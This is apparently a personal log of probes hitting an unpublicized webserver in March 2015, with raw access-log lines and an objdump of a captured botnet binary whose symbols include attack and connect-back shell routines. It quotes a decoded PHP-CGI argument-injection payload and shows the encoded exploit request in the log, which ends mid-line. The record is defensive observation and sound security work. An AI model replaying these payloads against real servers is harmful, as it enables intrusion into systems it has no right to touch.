2015-03-05: Here are the results of running a random, unpublicized webserver at a major virtual hoster site from 2015-03-03 through 2015-03-05. So far, it looks like we have had two probes: one is for home router vulnerabilities via tmUnblock.cgi, and the other seems to be looking for Drupal malconfiguration. 2015-03-19: There has certainly quite a pick up in activity over the last two weeks. There was a fairly generic probe from 54.147.26.255 on March 8; when decoded, it goes something like: -d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n There's quite an interesting small probe from 146.0.32.3 on march 11: 0x16 0x03 0x01; apparently someone is trying ssl against our port 80 server. It's repeated agagin March 13 from the same machine. On March 14, we have a flurry of probes from 204.110.9.197, looking for a large number of vulnerabilities. Also, we see another flurry og similar probes from 93.158.200.34 and then from 198.50.232.79 (the latter are looking for phpMyAdmin vulnerabilities). Later on 14th, we see 54.164.156.8 attempting some rather interesting attempts to find vulnerabilities that then run a script and then try to pull in further exploit scripts, ou.pl. On the 16th, we see 222.66.95.253 attempt a download attack also. This one is considerably more advanced; it's a statically link i386 ELF binary that has pretty interesting bits: ntldont: file format elf32-i386 ntldont architecture: i386, flags 0x00000112: EXEC_P, HAS_SYMS, D_PAGED start address 0x080480e0 Program Header: LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12 filesz 0x00125cb4 memsz 0x00125cb4 flags r-x LOAD off 0x00126000 vaddr 0x0816e000 paddr 0x0816e000 align 2**12 filesz 0x00006be8 memsz 0x0004cf54 flags rw- NOTE off 0x00000094 vaddr 0x08048094 paddr 0x08048094 align 2**2 filesz 0x00000020 memsz 0x00000020 flags r-- Sections: Idx Name Size VMA LMA File off Algn 0 .init 00000017 080480b4 080480b4 000000b4 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 1 .text 000ec101 080480e0 080480e0 000000e0 2**5 CONTENTS, ALLOC, LOAD, READONLY, CODE 2 __libc_freeres_fn 0000063e 081341e4 081341e4 000ec1e4 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 3 __libc_thread_freeres_fn 000000e1 08134824 08134824 000ec824 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 4 .fini 0000001b 08134908 08134908 000ec908 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 5 .rodata 00018dbe 08134940 08134940 000ec940 2**5 CONTENTS, ALLOC, LOAD, READONLY, DATA 6 __libc_subfreeres 00000034 0814d700 0814d700 00105700 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 7 __libc_atexit 00000004 0814d734 0814d734 00105734 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 8 __libc_thread_subfreeres 00000004 0814d738 0814d738 00105738 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 9 .eh_frame 0001a4fc 0814d73c 0814d73c 0010573c 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 10 .gcc_except_table 0000607c 08167c38 08167c38 0011fc38 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 11 .data 00006b48 0816e000 0816e000 00126000 2**5 CONTENTS, ALLOC, LOAD, DATA 12 .ctors 00000040 08174b48 08174b48 0012cb48 2**2 CONTENTS, ALLOC, LOAD, DATA 13 .dtors 00000008 08174b88 08174b88 0012cb88 2**2 CONTENTS, ALLOC, LOAD, DATA 14 .jcr 00000004 08174b90 08174b90 0012cb90 2**2 CONTENTS, ALLOC, LOAD, DATA 15 .got 00000054 08174b94 08174b94 0012cb94 2**2 CONTENTS, ALLOC, LOAD, DATA 16 .bss 00046340 08174c00 08174c00 0012cc00 2**5 ALLOC 17 __libc_freeres_ptrs 00000014 081baf40 081baf40 0012cc00 2**2 ALLOC 18 .comment 000012ba 00000000 00000000 0012cc00 2**0 CONTENTS, READONLY 19 .debug_aranges 00000078 00000000 00000000 0012dec0 2**3 CONTENTS, READONLY, DEBUGGING 20 .debug_pubnames 00000025 00000000 00000000 0012df38 2**0 CONTENTS, READONLY, DEBUGGING 21 .debug_info 00000a84 00000000 00000000 0012df5d 2**0 CONTENTS, READONLY, DEBUGGING 22 .debug_abbrev 00000138 00000000 00000000 0012e9e1 2**0 CONTENTS, READONLY, DEBUGGING 23 .debug_line 0000027c 00000000 00000000 0012eb19 2**0 CONTENTS, READONLY, DEBUGGING 24 .debug_frame 00000014 00000000 00000000 0012ed98 2**2 CONTENTS, READONLY, DEBUGGING 25 .debug_str 000006ba 00000000 00000000 0012edac 2**0 CONTENTS, READONLY, DEBUGGING 26 .note.ABI-tag 00000020 08048094 08048094 00000094 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA SYMBOL TABLE: 080480b4 l d .init 00000000 .init 080480e0 l d .text 00000000 .text 081341e4 l d __libc_freeres_fn 00000000 __libc_freeres_fn 08134824 l d __libc_thread_freeres_fn 00000000 __libc_thread_freeres_fn 08134908 l d .fini 00000000 .fini 08134940 l d .rodata 00000000 .rodata 0814d700 l d __libc_subfreeres 00000000 __libc_subfreeres 0814d734 l d __libc_atexit 00000000 __libc_atexit 0814d738 l d __libc_thread_subfreeres 00000000 __libc_thread_subfreeres 0814d73c l d .eh_frame 00000000 .eh_frame 08167c38 l d .gcc_except_table 00000000 .gcc_except_table 0816e000 l d .data 00000000 .data 08174b48 l d .ctors 00000000 .ctors 08174b88 l d .dtors 00000000 .dtors 08174b90 l d .jcr 00000000 .jcr 08174b94 l d .got 00000000 .got 08174c00 l d .bss 00000000 .bss 081baf40 l d __libc_freeres_ptrs 00000000 __libc_freeres_ptrs 00000000 l d .comment 00000000 .comment 00000000 l d .debug_aranges 00000000 .debug_aranges 00000000 l d .debug_pubnames 00000000 .debug_pubnames 00000000 l d .debug_info 00000000 .debug_info 00000000 l d .debug_abbrev 00000000 .debug_abbrev 00000000 l d .debug_line 00000000 .debug_line 00000000 l d .debug_frame 00000000 .debug_frame 00000000 l d .debug_str 00000000 .debug_str 08048094 l d .note.ABI-tag 00000000 .note.ABI-tag 00000000 l d *ABS* 00000000 .shstrtab 00000000 l d *ABS* 00000000 .symtab 00000000 l d *ABS* 00000000 .strtab 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crti.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/defs.h 00000000 l df *ABS* 00000000 initfini.c 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crti.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crti.S 08048104 l F .text 00000000 call_gmon_start 00000000 l df *ABS* 00000000 crtstuff.c 08174b48 l O .ctors 00000000 __CTOR_LIST__ 08174b88 l O .dtors 00000000 __DTOR_LIST__ 0814d73c l O .eh_frame 00000000 __EH_FRAME_BEGIN__ 08174b90 l O .jcr 00000000 __JCR_LIST__ 0816e008 l O .data 00000000 p.0 08174c00 l O .bss 00000001 completed.1 08048128 l F .text 00000000 __do_global_dtors_aux 08174c04 l O .bss 00000018 object.2 0804817c l F .text 00000000 frame_dummy 00000000 l df *ABS* 00000000 crtstuff.c 08174b84 l O .ctors 00000000 __CTOR_END__ 08174b8c l O .dtors 00000000 __DTOR_END__ 08167c34 l O .eh_frame 00000000 __FRAME_END__ 08174b90 l O .jcr 00000000 __JCR_END__ 0813401c l F .text 00000000 __do_global_ctors_aux 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crtn.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/defs.h 00000000 l df *ABS* 00000000 initfini.c 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crtn.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/crtn.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/csu/abi-tag.h 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 /usr/src/build/231499-i386/BUILD/glibc-2.3.2-20030313/build-i386-linux/config.h 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 00000000 l df *ABS* 00000000 abi-note.S 00000000 l df *ABS* 00000000 init.c 00000000 l df *ABS* 00000000 AmpResource.cpp 080483ee l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 0804842c l F .text 00000018 __tcf_0 08048444 l F .text 0000001a _GLOBAL__I_g_AmpResource 00000000 l df *ABS* 00000000 Attack.cpp 00000000 l df *ABS* 00000000 CmdMsg.cpp 00000000 l df *ABS* 00000000 ConfigDoing.cpp 080509d0 l F .text 00000074 _Z41__static_initialization_and_destruction_0ii 08050a44 l F .text 00000018 __tcf_0 08050a5c l F .text 00000018 __tcf_1 08050a74 l F .text 0000001a _GLOBAL__I_g_cnfgDoing 00000000 l df *ABS* 00000000 DNSCache.cpp 080526f8 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 08052736 l F .text 00000018 __tcf_0 0805274e l F .text 0000001a _GLOBAL__I_g_dnsCache 00000000 l df *ABS* 00000000 ExChange.cpp 0816e404 l O .data 00000004 _ZN13FetcherStorer16sm_nMaxStringLenE 00000000 l df *ABS* 00000000 Global.cpp 0805c5b4 l F .text 000002f6 _Z41__static_initialization_and_destruction_0ii 0805c8aa l F .text 00000018 __tcf_0 0805c8c2 l F .text 00000018 __tcf_1 0805c8da l F .text 00000018 __tcf_2 0805c8f2 l F .text 00000018 __tcf_3 0805c90a l F .text 00000018 __tcf_4 0805c922 l F .text 00000018 __tcf_5 0805c93a l F .text 00000018 __tcf_6 0805c952 l F .text 00000018 __tcf_7 0805c96a l F .text 00000018 __tcf_8 0805c982 l F .text 00000018 __tcf_9 0805c99a l F .text 00000018 __tcf_10 0805c9b2 l F .text 0000001a _GLOBAL__I_g_iBeikongLock 00000000 l df *ABS* 00000000 Main.cpp 00000000 l df *ABS* 00000000 Manager.cpp 0816e688 l O .data 00000004 _ZN13FetcherStorer16sm_nMaxStringLenE 00000000 l df *ABS* 00000000 MiniHttpHelper.cpp 00000000 l df *ABS* 00000000 ProtocolUtil.cpp 00000000 l df *ABS* 00000000 ProvinceDns.cpp 0816e740 l O .data 00000004 g_iProvinceDns 0816e760 l O .data 0000052c g_sProvinceDns 0806ce64 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 0806cea2 l F .text 00000018 __tcf_0 0806ceba l F .text 0000001a _GLOBAL__I_g_provinceDns 00000000 l df *ABS* 00000000 StatBase.cpp 0806e944 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 0806e982 l F .text 00000018 __tcf_0 0806e99a l F .text 0000001a _GLOBAL__I_g_statBase 00000000 l df *ABS* 00000000 SysTool.cpp 0816eca0 l O .data 00000004 uaSystoolNum 0816ecc0 l O .data 00000030 uaSystools 00000000 l df *ABS* 00000000 ThreadAtk.cpp 00000000 l df *ABS* 00000000 ThreadClientStatus.cpp 00000000 l df *ABS* 00000000 ThreadConnection.cpp 00000000 l df *ABS* 00000000 ThreadDoFun.cpp 0816ede0 l O .data 00000040 PADDING 00000000 l df *ABS* 00000000 ThreadFakeDetect.cpp 00000000 l df *ABS* 00000000 ThreadHttpGet.cpp 00000000 l df *ABS* 00000000 ThreadKillChaos.cpp 00000000 l df *ABS* 00000000 ThreadLoopCmd.cpp 00000000 l df *ABS* 00000000 ThreadMonGates.cpp 00000000 l df *ABS* 00000000 ThreadRecycle.cpp 00000000 l df *ABS* 00000000 ThreadShell.cpp 08080ddc l F .text 00000026 _Z7hangouti 08080e02 l F .text 000000e1 _Z9ptym_openPc 08080ee4 l F .text 000000ad _Z9ptys_openiPc 08080f92 l F .text 0000005c _Z8open_ttyRiS_ 080810a6 l F .text 000005b4 _Z11connectbackPKct 00000000 l df *ABS* 00000000 ThreadShellRecycle.cpp 00000000 l df *ABS* 00000000 ThreadTask.cpp 00000000 l df *ABS* 00000000 ThreadTns.cpp 00000000 l df *ABS* 00000000 ThreadUpdate.cpp 00000000 l df *ABS* 00000000 UserAgent.cpp 080832d4 l F .text 0000003e _Z41__static_initialization_and_destruction_0ii 08083312 l F .text 00000018 __tcf_0 0808332a l F .text 0000001a _GLOBAL__I_g_uaGlobal 00000000 l df *ABS* 00000000 AutoLock.cpp 00000000 l df *ABS* 00000000 FileOp.cpp 00000000 l df *ABS* 00000000 Ijduy.cpp 00000000 l df *ABS* 00000000 Iysd76.cpp 081370e0 l O .rodata 00000898 PrimeTable 00000000 l df *ABS* 00000000 Log.cpp 00000000 l df *ABS* 00000000 Md5.cpp 0816efa0 l O .data 00000040 PADDING 00000000 l df *ABS* 00000000 Media.cpp 0816eff8 l O .data 00000004 _ZN13FetcherStorer16sm_nMaxStringLenE 00000000 l df *ABS* 00000000 NetBase.cpp 00000000 l df *ABS* 00000000 ThreadCondition.cpp 00000000 l df *ABS* 00000000 Thread.cpp 00000000 l df *ABS* 00000000 ThreadMutex.cpp 00000000 l df *ABS* 00000000 Utility.cpp 0816f040 l O .data 00000040 PADDING 08089a00 l F .text 00000074 _Z41__static_initialization_and_destruction_0ii 08089a74 l F .text 00000018 __tcf_0 08089a8c l F .text 00000018 __tcf_1 08089aa4 l F .text 0000001a _GLOBAL__I__ZN8CUtility13sm_strBinPathE 00000000 l df *ABS* 00000000 WinDefSVC.cpp 08134040 l O .text 00000052 __evoke_link_warning_pthread_attr_setstackaddr 081340a0 l O .text 00000052 __evoke_link_warning_pthread_attr_getstackaddr 0808a854 l F .text 000000a7 cond_extricate_func 0808a8fc l F .text 000002c1 pthread_cond_timedwait_relative 0808b4b0 l F .text 00000084 join_extricate_func 08174e48 l O .bss 00000004 manager_thread 08174e4c l O .bss 00000004 terminated_children 0808bb50 l F .text 000001c8 pthread_reap_children 0808b784 l F .text 000003ca pthread_handle_create 0808bd18 l F .text 00000116 pthread_handle_free 08174e50 l O .bss 00000004 main_thread_exiting 0808be88 l F .text 00000045 pthread_for_each_thread 0808be30 l F .text 00000058 pthread_kill_all_threads 0808bed0 l F .text 00000080 pthread_handle_exit 0808c244 l F .text 00000137 pthread_allocate_stack 08174e54 l O .bss 00000004 pthread_threads_counter 0808c03c l F .text 000000f3 pthread_start_thread 0808c130 l F .text 00000113 pthread_start_thread_event 0816f0a0 l O .data 00000018 once_masterlock 0816f0c0 l O .data 00000030 once_finished 0816f0f0 l O .data 00000004 fork_generation 0808cc60 l F .text 00000039 pthread_once_cancelhandler 08137ab8 l O .rodata 00000008 sysctl_args.0 08174e58 l O .bss 00000004 __libc_multiple_threads_ptr 0808dc94 l F .text 0000006a pthread_handle_sigrestart 0808dba0 l F .text 000000f4 pthread_handle_sigcancel 0808dd00 l F .text 00000005 pthread_handle_sigdebug 0808daac l F .text 000000f1 pthread_onexit_process 0808dd08 l F .text 0000021e pthread_initialize 08174e5c l O .bss 00000004 current_level 0816fb20 l O .data 00002000 pthread_keys 08171b20 l O .data 00000018 pthread_keys_mutex 0808e8dc l F .text 000000a7 pthread_key_delete_helper 0808f1e4 l F .text 000000a7 new_sem_extricate_func 0808fa2c l F .text 0000005c __pthread_acquire 08174e64 l O .bss 00000004 wait_node_free_list_spinlock 08174e60 l O .bss 00000004 wait_node_free_list 0808fddc l F .text 0000021b do_fcntl 08137b78 l O .rodata 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 08137b80 l O .rodata 00000083 _ZZNSt24__default_alloc_templateILb1ELi0EE8allocateEjE19__PRETTY_FUNCTION__ 08137dc4 l O .rodata 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 08174ee0 l O .bss 00004000 emergency_buffer 08178ee0 l O .bss 00000004 emergency_used 08171c84 l O .data 00000018 emergency_mutex 08171c9c l O .data 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 08178ee4 l O .bss 00000008 globals_static 08178eec l O .bss 00000004 globals_key 08171ce8 l O .data 00000004 use_thread_key 08095880 l F .text 00000046 _Z16get_globals_dtorPv 080958d0 l F .text 00000041 _Z16get_globals_initv 08171cec l O .data 00000004 _ZZ21get_globals_init_oncevE4once 08171cf0 l O .data 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 08095920 l F .text 0000005c _Z21get_globals_init_oncev 08095a60 l F .text 0000005a _Z21size_of_encoded_valueh 08095ac0 l F .text 0000008a _Z21base_of_encoded_valuehP15_Unwind_Context 08095b50 l F .text 00000038 _Z12read_uleb128PKhPj 08095b90 l F .text 0000004f _Z12read_sleb128PKhPi 08095be0 l F .text 000000dd _Z28read_encoded_value_with_basehjPKhPj 08095cc0 l F .text 000000e7 _Z17parse_lsda_headerP15_Unwind_ContextPKhP16lsda_header_info 08095db0 l F .text 00000051 _Z15get_ttype_entryP16lsda_header_infoj 08095e10 l F .text 00000068 _Z16get_adjusted_ptrPKSt9type_infoS1_PPv 08095e80 l F .text 0000006c _Z20check_exception_specP16lsda_header_infoPKSt9type_infoPvi 08095ca2 l .text 00000000 .L48 08095c26 l .text 00000000 .L42 08095c77 l .text 00000000 .L44 08095ca9 l .text 00000000 .L49 08095c80 l .text 00000000 .L50 08095c87 l .text 00000000 .L43 08095c9d l .text 00000000 .L47 080965d0 l F .text 00000055 _Z23__gxx_exception_cleanup19_Unwind_Reason_CodeP17_Unwind_Exception 08171e4c l O .data 00000004 _ZZNSt8ios_base6xallocEvE6_S_top 080b6a50 l F .text 0000056a _Z41__static_initialization_and_destruction_0ii 080b71e0 l F .text 0000001e _GLOBAL__I__ZNSt21__ctype_abstract_baseIcED0Ev.._.._.._.._libstdc___v3_src_locale_inst.ccBN9dib 08138f58 l O .rodata 00000004 _ZZ18__gthread_active_pvE20__gthread_active_ptr 080c69d0 l F .text 00000048 _Z41__static_initialization_and_destruction_0ii 080c6a20 l F .text 0000001e _GLOBAL__I__ZNSt7codecvtIcc11__mbstate_tE2idE 080c7220 l F .text 00000048 _Z41__static_initialization_and_destruction_0ii 080c7270 l F .text 0000001e _GLOBAL__I__ZNSt5ctypeIcE13classic_tableEv 0817904c l O .bss 00000001 _ZSt8__ioinit 080c7ef0 l F .text 00000043 _Z41__static_initialization_and_destruction_0ii 080c7f40 l F .text 00000010 __tcf_0 080c7f50 l F .text 0000001e _GLOBAL__I__ZN9__gnu_cxx13stdio_filebufIwSt11char_traitsIwEE2fdEv.._.._.._.._libstdc___v3_src_ext_inst.cc8hFDhb 08179df0 l O .bss 00000001 _ZSt8__ioinit 080ce080 l F .text 00000043 _Z41__static_initialization_and_destruction_0ii 080ce0d0 l F .text 00000010 __tcf_0 080ce0e0 l F .text 0000001e _GLOBAL__I__ZThn8_NSt14basic_iostreamIwSt11char_traitsIwEED0Ev.._.._.._.._libstdc___v3_src_io_inst.ccm1Emhb 080ced34 l F .text 0000020e __udivmoddi4 080cef68 l F .text 0000020e __udivmoddi4 080cf178 l F .text 00000055 size_of_encoded_value 080cf1d0 l F .text 0000007c base_of_encoded_value 080cf24c l F .text 00000033 read_uleb128 080cf280 l F .text 0000004a read_sleb128 080cf2cc l F .text 000000c6 read_encoded_value_with_base 080cf3c4 l F .text 00000152 extract_cie_info 080cf518 l F .text 00000441 execute_stack_op 080cf95c l F .text 000004e0 execute_cfa_program 080cfe3c l F .text 0000024d uw_frame_state_for 080d01d0 l F .text 00000137 uw_update_context_1 080d0308 l F .text 0000002e uw_update_context 080d0338 l F .text 00000079 uw_init_context_1 08173a30 l O .data 00000004 once_regsizes.0 08173a34 l O .data 00000004 __gthread_active_ptr.1 080d03b4 l F .text 00000107 uw_install_context_1 08179df4 l O .bss 00000011 dwarf_reg_size_table 080d097c l F .text 0000007e init_dwarf_reg_size_table 080d04bc l F .text 000000b2 _Unwind_RaiseException_Phase2 080d06c4 l F .text 000000ea _Unwind_ForcedUnwind_Phase2 Then on March 17th, we see two similar attacks, but unfortunately the attacker has stripped these binaries has UPX encoded them. While there is no debugging information in either of these, udso has not been stripped so we still can extract a namelist, which, among other things, shows that gmon profiling data is apparently being collected. 2015-03-31: It seems to have become more quiet; the logs don't seem to show any new attacks or anomalous entries. ==> access.log <== 188.138.17.205 - - [03/Mar/2015:18:39:36 +0000] "GET / HTTP/1.1" 200 460 "-" "-" 188.138.17.205 - - [03/Mar/2015:18:39:36 +0000] "GET /robots.txt HTTP/1.1" 404 470 "-" "-" 188.138.17.205 - - [03/Mar/2015:18:40:11 +0000] "GET / HTTP/1.1" 200 460 "-" "-" 188.138.17.205 - - [03/Mar/2015:18:40:11 +0000] "GET /robots.txt HTTP/1.1" 404 470 "-" "-" 128.61.240.66 - - [04/Mar/2015:05:08:46 +0000] "GET / HTTP/1.0" 200 453 "-" "netscan.gtisc.gatech.edu" 23.20.55.147 - - [04/Mar/2015:07:21:29 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net" 188.138.17.205 - - [04/Mar/2015:07:23:17 +0000] "GET / HTTP/1.1" 200 460 "-" "-" 188.138.17.205 - - [04/Mar/2015:07:23:18 +0000] "GET /robots.txt HTTP/1.1" 404 470 "-" "-" 118.98.104.21 - - [04/Mar/2015:07:57:05 +0000] "GET /user/soapCaller.bs HTTP/1.1" 404 471 "-" "Morfeus [redacted] Scanner" 206.82.85.41 - - [04/Mar/2015:10:43:20 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 525 "-" "-" 115.159.63.139 - - [04/Mar/2015:11:19:35 +0000] "GET http://www.mafengwo.com/ HTTP/1.1" 200 446 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.\ 0" 54.146.28.237 - - [04/Mar/2015:18:36:32 +0000] "GET / HTTP/1.1" 200 453 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" 182.118.55.249 - - [04/Mar/2015:21:26:59 +0000] "GET / HTTP/1.1" 200 427 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/\ 41.0.2251.0 Safari/537.36" 94.102.49.168 - - [05/Mar/2015:01:53:45 +0000] "GET / HTTP/1.1" 200 460 "-" "-" 128.61.240.66 - - [05/Mar/2015:13:10:03 +0000] "GET / HTTP/1.0" 200 453 "-" "netscan.gtisc.gatech.edu" 61.240.144.66 - - [05/Mar/2015:16:40:26 +0000] "GET / HTTP/1.0" 200 453 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 222.186.21.70 - - [05/Mar/2015:20:32:47 +0000] "GET https://www.baidu.com/ HTTP/1.1" 200 427 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0" 58.213.132.149 - - [06/Mar/2015:06:09:01 +0000] "GET / HTTP/1.0" 200 453 "-" "-" 58.213.132.149 - - [06/Mar/2015:06:09:02 +0000] "HEAD / HTTP/1.1" 200 276 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)" 58.213.132.149 - - [06/Mar/2015:06:09:02 +0000] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)" 128.61.240.66 - - [06/Mar/2015:10:18:17 +0000] "GET / HTTP/1.0" 200 453 "-" "netscan.gtisc.gatech.edu" 54.144.23.48 - - [06/Mar/2015:11:46:40 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net" 192.187.110.98 - - [06/Mar/2015:15:05:02 +0000] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 450 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 61.240.144.66 - - [06/Mar/2015:18:52:45 +0000] "GET / HTTP/1.0" 200 453 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 188.138.17.205 - - [06/Mar/2015:21:33:14 +0000] "GET / HTTP/1.1" 200 460 "-" "-" 182.118.53.116 - - [06/Mar/2015:21:39:53 +0000] "GET / HTTP/1.1" 200 427 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36" 54.81.139.232 - - [06/Mar/2015:23:53:11 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net" 74.118.89.171 - - [07/Mar/2015:13:21:30 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 525 "-" "-" 54.198.22.218 - - [07/Mar/2015:13:53:36 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net" 61.240.144.66 - - [07/Mar/2015:22:55:25 +0000] "GET / HTTP/1.0" 200 453 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 54.166.201.51 - - [08/Mar/2015:01:53:22 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net" 54.147.26.255 - - [08/Mar/2015:02:40:44 +0000] "HEAD / HTTP/1.0" 200 276 "-" "-" 54.147.26.255 - - [08/Mar/2015:02:40:54 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2